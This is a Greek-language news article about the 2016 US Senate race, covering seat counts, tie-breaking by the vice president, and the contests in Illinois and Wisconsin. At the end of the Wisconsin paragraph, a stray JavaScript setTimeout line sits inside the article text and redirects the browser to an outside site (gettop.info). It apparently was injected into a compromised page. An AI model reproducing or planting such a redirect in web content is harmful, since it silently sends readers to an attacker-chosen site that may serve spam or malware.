ΗΠΑ: Αμφίρροπη η μάχη για τη Γερουσία

0
8

Στις εκλογές της 8ης Νοεμβρίου, πέρα από την ανάδειξη του επόμενου προέδρου των ΗΠΑ, τα δύο μεγάλα κόμματα μάχονται επίσης για τον έλεγχο της Γερουσίας, όπου σήμερα οι Ρεπουμπλικανοί έχουν την πλειοψηφία αλλά κινδυνεύουν να την χάσουν.

Στην απερχόμενη Γερουσία το Ρεπουμπλικανικό κόμμα έχει 54 έδρες και οι Δημοκρατικοί 44. Δύο ανεξάρτητοι γερουσιαστές συνήθως ακολουθούν τους Δημοκρατικούς στις ψηφοφορίες.

Στις εκλογές θα ανανεωθεί το ένα τρίτο του Σώματος, δηλαδή 34 έδρες εκ των οποίων τις 24 σήμερα έχουν οι Ρεπουμπλικανοί και τις 10 οι Δημοκρατικοί. Για να αποκτήσουν την πλειοψηφία οι Δημοκρατικοί χρειάζεται να κερδίσουν άλλες 4 έδρες, εφόσον νικήτρια στις προεδρικές εκλογές αναδειχτεί η Χίλαρι Κλίντον και αυτό επειδή όταν υπάρχει ισοψηφία, ο αντιπρόεδρος των ΗΠΑ είναι αυτός που δίνει την καθοριστική ψήφο. Αν εκλεγεί ο Ντόναλντ Τραμπ, το Δημοκρατικό Κόμμα χρειάζεται πέντε επιπλέον έδρες ώστε, μαζί με τους δύο ανεξάρτητους, να διαθέτει 51 ψήφους στη Γερουσία.

Η τελευταία φορά που η Γερουσία ήταν διαιρεμένη (50-50), ήταν κατά την πρώτη χρονιά της θητείας του προέδρου Τζορτζ Ου. Μπους, οπότε ο αντιπρόεδρος Ντικ Τσένι έριχνε την καθοριστική ψήφο.

Σύμφωνα με όλες τις ενδείξεις οι Δημοκρατικοί αναμένεται να κερδίσουν τις έδρες στο Ιλινόι και το Ουισκόνσιν. Το Ιλινόι ψηφίζει υπέρ των Δημοκρατικών υποψηφίων, ιδίως όταν οι εκλογές συμπίπτουν με τις προεδρικές. Στο Ουισκόνσιν ο Ρεπουμπλικανός γερουσιαστής Ρον Τζόνσον δίνει μάχη στήθος με στήθος με τον Δημοκρατικό Ρας Φάινγκολντ, τον οποίο είχε νικήσει πριν από έξι χρόνια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here